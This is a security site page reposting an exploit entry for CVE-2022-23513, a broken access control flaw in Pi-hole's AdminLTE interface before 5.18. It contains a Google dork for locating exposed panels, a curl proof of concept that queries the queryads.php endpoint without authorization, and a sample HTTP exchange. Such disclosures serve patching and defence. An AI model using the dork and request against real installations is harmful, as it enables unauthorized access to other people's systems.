Home Tools Exploits & CVE's AdminLTE PiHole Broken Access Control

AdminLTE PiHole Broken Access Control

September 5, 2023

301

Authored by kv1to

AdminTLE PiHole versions prior to 5.18 suffer from a broken access control vulnerability.

advisories | CVE-2022-23513

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513

In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.

## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'

## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]

## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]

data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>

AdminLTE PiHole Broken Access Control

Follow us on Instagram @thecyberpost

EDITOR PICKS

Feds nab alleged money launderers for pig butchering scheme

Grindr’s chief privacy officer on the dating app’s data controversies

Chyrp 2.5.2 Cross Site Scripting

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

SugarCRM 12.x Remote Code Execution / Shell Upload

Rocket LMS 1.1 Cross Site Scripting

Online Library Management System 2.0 Cross Site Request Forgery